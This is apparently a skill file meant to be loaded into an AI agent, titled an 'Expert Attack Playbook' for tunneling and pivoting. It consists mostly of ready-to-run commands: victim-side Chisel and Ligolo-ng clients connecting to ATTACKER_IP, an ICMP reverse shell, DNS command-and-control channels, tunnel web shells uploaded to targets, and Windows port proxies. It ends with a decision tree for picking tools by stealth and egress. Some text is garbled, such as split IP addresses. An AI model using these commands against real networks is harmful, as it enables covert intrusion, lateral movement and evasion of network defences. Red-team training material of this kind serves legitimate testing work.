- SKILL: Tunneling & Pivoting — Expert Attack Playbook
- AI LOAD INSTRUCTION
- Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup. 0. RELATED ROUTING Before going deep, consider loading: network-protocol-attacks for network-level attacks from pivot positions reverse-shell-techniques for establishing initial access shells unauthorized-access-common-services for exploiting services discovered through pivots linux-privilege-escalation or windows-privilege-escalation after pivoting to new hosts 1. SSH TUNNELING Local Port Forward Forward a local port to a remote service through the pivot.
Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306 :INTERNAL_HOST:3306 user@PIVOT -N
Access internal web app
ssh -L 8080 :10.10.10.100:80 user@PIVOT -N
Browse: http://localhost:8080
Bind to all interfaces (share with teammates)
ssh -L 0.0 .0.0:8080:INTERNAL:80 user@PIVOT -N Remote Port Forward Expose a local service to the pivot host's network.
Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000 :127.0.0.1:8000 user@PIVOT -N
Expose attacker's listener to internal network
ssh -R 0.0 .0.0:4444:127.0.0.1:4444 user@PIVOT -N
Internal hosts connect to PIVOT:4444 → reaches attacker:4444
Dynamic Port Forward (SOCKS Proxy)
Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N
Use with proxychains
echo "socks5 127.0.0.1 1080"
/etc/proxychains4.conf proxychains nmap -sT -Pn -p 80,443 ,445 INTERNAL_SUBNET/24
Or with browser SOCKS proxy → browse internal web apps
Jump Host (ProxyJump)
Single jump
ssh -J jumphost user@TARGET
Multiple jumps
ssh -J jump1,jump2 user@TARGET
SSH config for persistent jump
~/.ssh/config
Host internal-target HostName 10.10 .10.100 User admin ProxyJump user@jumphost.example.com 2. CHISEL Reverse SOCKS Proxy (Most Common)
Attacker: start chisel server
chisel server --reverse --port 8080
Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks
Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24 Port Forwarding
Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306
Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80
Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444 3. LIGOLO-NG TUN interface-based pivoting — transparent routing without SOCKS.
Attacker: start proxy
sudo ip tuntap add user $( whoami ) mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert -laddr 0.0 .0.0:11601
Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert
In ligolo-proxy console:
session
select agent session
ifconfig
view agent's network interfaces
start
start tunnel
Add routes on attacker to reach internal networks
sudo ip route add 10.10 .10.0/24 dev ligolo sudo ip route add 172.16 .0.0/16 dev ligolo Listener (Reverse Shell Catcher Through Pivot)
In ligolo-proxy console:
listener_add --addr 0.0 .0.0:4444 --to 127.0 .0.1:4444 --tcp
Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
Double Pivot
Agent 1 on DMZ → tunnel to internal network 1
Agent 2 on internal network 1 → tunnel to internal network 2
Add routes for both networks on attacker
sudo ip route add 10.0 .0.0/24 dev ligolo
via agent 1
sudo ip route add 172.16 .0.0/24 dev ligolo
via agent 2
- SOCAT
TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80
UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53
Encrypted tunnel
socat OPENSSL-LISTEN:443,cert
server.pem,verify
0 ,fork TCP:INTERNAL:80
File transfer via socat
Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
Sender:
socat TCP:RECEIVER:9999 file:send_file 5. PROXYCHAINS / PROXIFIER ProxyChains Configuration
/etc/proxychains4.conf
strict_chain # fail if any proxy is down
dynamic_chain # skip dead proxies
random_chain # randomize proxy order
[ ProxyList ] socks5 127.0.0.1 1080 # first hop (SSH dynamic forward) socks5 127.0.0.1 1081 # second hop (if chaining)
Usage
proxychains nmap -sT -Pn -p 22,80 ,445 10.10 .10.0/24 proxychains crackmapexec smb 10.10 .10.0/24 proxychains evil-winrm -i 10.10 .10.50 -u admin -p pass 6. WINDOWS PIVOTING Netsh Port Forwarding :: Forward port (requires admin) netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP :: List forwards netsh interface portproxy show all :: Remove netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 Plink (PuTTY CLI) :: Dynamic SOCKS (like ssh -D) plink.exe -ssh -D 1080 -N user@ATTACKER :: Remote port forward plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER :: Automated (non-interactive, accept host key) echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER 7. DNS TUNNELING
iodine — IP-over-DNS
Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0 .0.1 t1.yourdomain.com
Client (victim):
iodine -f -P password t1.yourdomain.com
Creates dns0 interface → route traffic through it
dnscat2 — command channel over DNS
Server:
ruby dnscat2.rb yourdomain.com
Client:
./dnscat --dns = server = ATTACKER,port = 53 --secret = SHARED_SECRET 8. ICMP TUNNELING
icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all = 1 python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
Victim (Windows):
icmpsh.exe -t ATTACKER_IP
ptunnel-ng — TCP-over-ICMP
Server:
ptunnel-ng -r INTERNAL_HOST -R 22
Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22 ssh -p 2222 user@127.0.0.1 9. HTTP TUNNELING
Neo-reGeorg — SOCKS proxy via web shell
Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
Upload tunnel.php/aspx/jsp to target web server
Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
SOCKS proxy on 127.0.0.1:1080
Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP 10. PIVOTING DECISION MATRIX Egress Allowed Tool Notes TCP outbound (any port) Chisel, Ligolo-ng, SSH Fastest setup TCP 80/443 only Chisel (HTTP/S), Neo-reGeorg Blend with web traffic DNS only (53/udp) iodine, dnscat2 Slow but stealthy ICMP only ptunnel-ng, icmpsh Very restricted environments No outbound Bind shell + port forward in Needs inbound access to pivot Web shell only Neo-reGeorg, Tunna When only HTTP file upload works 11. DECISION TREE Compromised host — need to reach internal network │ ├── Can install tools on pivot? │ ├── YES + outbound TCP allowed? │ │ ├── Need transparent routing? → Ligolo-ng (§3) │ │ ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2) │ │ └── SSH available? → SSH dynamic forward (§1) │ │ │ ├── YES + only HTTP(S) outbound? │ │ ├── Chisel over HTTPS (§2) │ │ └── Upload web tunnel → Neo-reGeorg (§9) │ │ │ ├── YES + only DNS outbound? │ │ └── iodine or dnscat2 (§7) │ │ │ └── YES + only ICMP allowed? │ └── ptunnel-ng or icmpsh (§8) │ ├── Cannot install tools (web shell only)? │ └── Neo-reGeorg / Tunna via web shell (§9) │ ├── Windows pivot? │ ├── Admin access? → netsh portproxy (§6) │ ├── SSH client available? → ssh.exe (Windows 10+) (§1) │ └── Outbound SSH? → plink (§6) │ ├── Need multi-layer pivot? │ ├── Ligolo-ng: multiple agents + route stacking (§3) │ ├── SSH ProxyJump chaining (§1) │ └── ProxyChains with multiple SOCKS (§5) │ └── Teammate needs access too? ├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...) └── Share Ligolo-ng routes via common proxy